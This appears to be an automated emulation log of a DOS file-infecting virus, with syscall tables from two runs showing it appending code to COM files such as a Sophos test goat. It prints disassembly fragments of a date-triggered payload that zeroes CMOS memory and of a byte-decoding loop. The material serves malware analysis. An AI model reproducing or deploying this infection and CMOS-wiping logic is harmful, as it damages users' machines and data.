{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10972,"SideJobID":0}
.
GIF
Syscalls:
| Time | Syscall Op | Syscall Name |
|---|---|---|
| 2018-12-25T12:29:44.131914761Z | 47 | PC: 14560 | Get disk transfer address |
| 2018-12-25T12:29:44.133448833Z | 26 | PC: 1456e | Set disk transfer address |
| 2018-12-25T12:29:44.134652455Z | 78 | PC: 14707 | Find first file |
| 2018-12-25T12:29:44.140438929Z | 79 | PC: 145e7 | Find next file |
| 2018-12-25T12:29:44.143421203Z | 79 | PC: 145e7 | Find next file (See above) |
| 2018-12-25T12:29:44.145828982Z | 79 | PC: 145e7 | Find next file (See above) |
| 2018-12-25T12:29:44.14813522Z | 79 | PC: 145e7 | Find next file (See above) |
| 2018-12-25T12:29:44.15071453Z | 79 | PC: 145e7 | Find next file (See above) |
| 2018-12-25T12:29:44.153185473Z | 79 | PC: 145e7 | Find next file (See above) |
| 2018-12-25T12:29:44.155511044Z | 79 | PC: 145e7 | Find next file (See above) |
| 2018-12-25T12:29:44.157829877Z | 67 | PC: 14707 | Get or set file attributes (See above) |
| 2018-12-25T12:29:44.171570669Z | 67 | PC: 14707 | Get or set file attributes (See above) |
| 2018-12-25T12:29:44.24097781Z | 61 | PC: 14707 | Open file (See above) |
| 2018-12-25T12:29:44.248149804Z | 87 | PC: 14632 | Get or set file date and time |
| 2018-12-25T12:29:44.250424186Z | 63 | PC: 14647 | Read file or device (Read 3 bytes on handle 5) |
| 2018-12-25T12:29:44.253151219Z | 66 | PC: 14657 | Move file pointer |
| 2018-12-25T12:29:44.255042319Z | 64 | PC: 14698 | Write file or device (Write 599 bytes on handle 5) |
| 2018-12-25T12:29:44.263943607Z | 66 | PC: 146a6 | Move file pointer |
| 2018-12-25T12:29:44.265293338Z | 64 | PC: 146b5 | Write file or device (Write 3 bytes on handle 5) |
| 2018-12-25T12:29:44.268190884Z | 87 | PC: 146c1 | Get or set file date and time |
| 2018-12-25T12:29:44.270281867Z | 62 | PC: 146c5 | Close file |
| 2018-12-25T12:29:44.277975494Z | 67 | PC: 14707 | Get or set file attributes (See above) |
| 2018-12-25T12:29:44.287629093Z | 26 | PC: 146d4 | Set disk transfer address |
| 2018-12-25T12:29:44.289746128Z | 37 | PC: 146f2 | Set interrupt vector (Interrupt = '28' AKA 'Get allocation info for specified drive') |
| 2018-12-25T12:29:44.291510716Z | 42 | PC: 13ea6 | Get date 0x13ea6: cmp dl, 2 0x13ea9: jne 0x13f16 0x13eab: pushaw 0x13eac: pushaw 0x13ead: mov cx, 0x40 0x13eb0: mov ax, cx 0x13eb2: out 0x70, ax 0x13eb4: mov al, 0 0x13eb6: out 0x71, al 0x13eb8: loop 0x13eb0 0x13eba: mov ax, 0x600 0x13ebd: mov cx, 0 0x13ec0: mov dl, 0x4f 0x13ec2: mov dh, 0x18 0x13ec4: mov bh, 7 0x13ec6: int 0x10 0x13ec8: popaw 0x13ec9: mov di, 1 0x13ecc: mov ch, 2 0x13ece: mov bp, 0 |
| 2018-12-25T12:29:44.293909209Z | 44 | PC: 13f1a | Get time 0x13f1a: add si, 0x66 0x13f1d: mov byte ptr [si + 0x57], dl 0x13f20: cld 0x13f21: mov dx, si 0x13f23: mov di, si 0x13f25: add di, 0x10 0x13f28: mov cx, 0xc8 0x13f2b: mov al, byte ptr [di] 0x13f2d: sub al, 0x12 0x13f2f: mov byte ptr [di], al 0x13f31: add di, 1 0x13f34: loop 0x13f2b 0x13f36: mov dx, si 0x13f38: add si, 0xa 0x13f3b: mov di, 0x100 0x13f3e: mov cx, 3 0x13f41: rep movsb byte ptr es:[di], byte ptr [si] 0x13f43: mov si, dx 0x13f45: push es 0x13f46: mov ah, 0x2f |
| 2018-12-25T12:29:44.296834841Z | 47 | PC: 13f4a | Get disk transfer address |
| 2018-12-25T12:29:44.310782063Z | 26 | PC: 13f59 | Set disk transfer address |
| 2018-12-25T12:29:44.311983807Z | 78 | PC: 13fe1 | Find first file |
| 2018-12-25T12:29:44.318490273Z | 67 | PC: 1401a | Get or set file attributes |
| 2018-12-25T12:29:44.323094047Z | 67 | PC: 1402a | Get or set file attributes |
| 2018-12-25T12:29:44.331582453Z | 61 | PC: 14034 | Open file (Filename = 'SLEEP.COM') |
| 2018-12-25T12:29:44.33686529Z | 87 | PC: 14040 | Get or set file date and time |
| 2018-12-25T12:29:44.339244398Z | 63 | PC: 14065 | Read file or device (Read 3 bytes on handle 5) |
| 2018-12-25T12:29:44.345861819Z | 66 | PC: 14077 | Move file pointer |
| 2018-12-25T12:29:44.347588472Z | 64 | PC: 140b7 | Write file or device (Write 1042 bytes on handle 5) |
| 2018-12-25T12:29:44.353263365Z | 66 | PC: 140ce | Move file pointer |
| 2018-12-25T12:29:44.354593386Z | 64 | PC: 140dc | Write file or device (Write 3 bytes on handle 5) |
| 2018-12-25T12:29:44.359321397Z | 87 | PC: 140f2 | Get or set file date and time |
| 2018-12-25T12:29:44.360425191Z | 62 | PC: 140f6 | Close file |
| 2018-12-25T12:29:44.36582474Z | 67 | PC: 14103 | Get or set file attributes |
| 2018-12-25T12:29:44.369295318Z | 26 | PC: 1410d | Set disk transfer address |
| 2018-12-25T12:29:44.370252914Z | 9 | PC: 12a85 | Display string (String= 'Sophos Ltd, Oxford sacrificial COM goat 1400H bytes long ') |
| 2018-12-25T12:29:44.373677021Z | 0 | PC: 12a89 | Program terminate |
{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10972,"SideJobID":0}
.
GIF
Syscalls:
| Time | Syscall Op | Syscall Name |
|---|---|---|
| 2018-12-25T12:29:44.240157989Z | 47 | PC: 14560 | Get disk transfer address |
| 2018-12-25T12:29:44.245416696Z | 26 | PC: 1456e | Set disk transfer address |
| 2018-12-25T12:29:44.247501492Z | 78 | PC: 14707 | Find first file |
| 2018-12-25T12:29:44.254130201Z | 79 | PC: 145e7 | Find next file |
| 2018-12-25T12:29:44.257631159Z | 79 | PC: 145e7 | Find next file (See above) |
| 2018-12-25T12:29:44.260316055Z | 79 | PC: 145e7 | Find next file (See above) |
| 2018-12-25T12:29:44.26297056Z | 79 | PC: 145e7 | Find next file (See above) |
| 2018-12-25T12:29:44.265622123Z | 79 | PC: 145e7 | Find next file (See above) |
| 2018-12-25T12:29:44.268349611Z | 79 | PC: 145e7 | Find next file (See above) |
| 2018-12-25T12:29:44.271032639Z | 79 | PC: 145e7 | Find next file (See above) |
| 2018-12-25T12:29:44.273676807Z | 67 | PC: 14707 | Get or set file attributes (See above) |
| 2018-12-25T12:29:44.280611802Z | 67 | PC: 14707 | Get or set file attributes (See above) |
| 2018-12-25T12:29:45.005422206Z | 61 | PC: 14707 | Open file (See above) |
| 2018-12-25T12:29:45.013375336Z | 87 | PC: 14632 | Get or set file date and time |
| 2018-12-25T12:29:45.015275947Z | 63 | PC: 14647 | Read file or device (Read 3 bytes on handle 5) |
| 2018-12-25T12:29:45.017149291Z | 66 | PC: 14657 | Move file pointer |
| 2018-12-25T12:29:45.018850093Z | 64 | PC: 14698 | Write file or device (Write 599 bytes on handle 5) |
| 2018-12-25T12:29:45.024837113Z | 66 | PC: 146a6 | Move file pointer |
| 2018-12-25T12:29:45.025946497Z | 64 | PC: 146b5 | Write file or device (Write 3 bytes on handle 5) |
| 2018-12-25T12:29:45.028040694Z | 87 | PC: 146c1 | Get or set file date and time |
| 2018-12-25T12:29:45.030118211Z | 62 | PC: 146c5 | Close file |
| 2018-12-25T12:29:45.038631979Z | 67 | PC: 14707 | Get or set file attributes (See above) |
| 2018-12-25T12:29:45.049422833Z | 26 | PC: 146d4 | Set disk transfer address |
| 2018-12-25T12:29:45.051336035Z | 37 | PC: 146f2 | Set interrupt vector (Interrupt = '28' AKA 'Get allocation info for specified drive') |
| 2018-12-25T12:29:45.052927693Z | 42 | PC: 13ea6 | Get date 0x13ea6: cmp dl, 2 0x13ea9: jne 0x13f16 0x13eab: pushaw 0x13eac: pushaw 0x13ead: mov cx, 0x40 0x13eb0: mov ax, cx 0x13eb2: out 0x70, ax 0x13eb4: mov al, 0 0x13eb6: out 0x71, al 0x13eb8: loop 0x13eb0 0x13eba: mov ax, 0x600 0x13ebd: mov cx, 0 0x13ec0: mov dl, 0x4f 0x13ec2: mov dh, 0x18 0x13ec4: mov bh, 7 0x13ec6: int 0x10 0x13ec8: popaw 0x13ec9: mov di, 1 0x13ecc: mov ch, 2 0x13ece: mov bp, 0 |
| 2018-12-25T12:29:45.401545126Z | 76 | PC: 13f16 | Terminate with return code (Return code = '0') |